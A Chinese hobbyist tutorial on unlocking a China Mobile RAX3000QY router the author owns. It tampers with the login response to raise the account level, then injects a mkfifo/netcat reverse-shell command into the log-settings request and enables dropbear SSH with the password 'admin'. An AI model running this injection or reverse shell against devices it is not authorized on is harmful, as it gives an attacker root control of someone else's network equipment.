前言
开学前,35元从小黄鱼购入一台移动rax3000qy,并且因这台机子比较小,直接塞网络箱里,当主路由拨号,并且体验一下wifi6
到手这台机子固件版本是Ver1.0.0(此为FakeVersion),PING次数为4,并且试尽办法,仍然无法用超管的账户登陆,由此可知,我手上这台机子应该是无superadmin账户的web面板(要折腾的话,要等暑假了)。
本文根据恩山论坛大佬ponyjs的文章和本人的经历总结
需要的工具
正式步骤
破解Shell
- 启动 Reqable 并设置好代理
- 用浏览器登陆路由器后台(默认192.168.10.1)
- 找到
路由器后台ip/item/login数据包,右键→修改响应![picture1]()
- 添加修改响应规则
"account_level":"3"替换成"account_level":"1"![picture2]()
- 重新登陆路由器后台,会发现页面多了一下控件
![picture3]()
- 路由器后台,更多→管理→日志管理,把日志开关打开
![picture4]()
- 在 Reqable 寻找日志数据包,右键编辑
![picture5]()
- 在 cmd 中输入
ipconfig查看本机ip地址(此为192.168.1.7)![picture6]()
- 在请求体
websys.log后边添加1
|rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc ip地址 4444 >/tmp/f
![picture7]()
- 启动 Netcat ,并监听
4444端口,在 Reqable 中点击发送,即可获取Shell1
nc -lvnp 4444
![picture8]()
![picture9]()
解锁ssh并固化
- 在上步👆 Netcat 中输入
passwd,再输入两次admin,设置ssh登陆密码,再在22端口启动dropbear ssh服务1
$(dropbear${IFS}-p${IFS}22)![picture10]()
- 再打开 WinSCP (或其他ssh工具, cmd 也可),登陆ssh
![picture11]()
![picture12]()
![picture13]()
- 修改端口和 enable 值
- 在 WinSCP 里在目录
/etc/config右键dropbear文件,编辑它,修改端口和 enable 值,修改成以下1 2 3 4 5
config dropbear option PasswordAuth 'on' option RootPasswordAuth 'on' option Port '22' option enable '1'
- 在 cmd 里输入命令
vi /etc/config/dropbear,进入vi/vim模式,编辑成3.1一致(vi/vim命令可以看菜鸟教程)
- 在 WinSCP 里在目录
- dropbear 开机启动
- 在 WinSCP 快捷键
Shift+Ctrl+T进入终端,输入命令/etc/init.d/dropbear enable - 在 cmd 输入命令
/etc/init.d/dropbear enable
- 在 WinSCP 快捷键
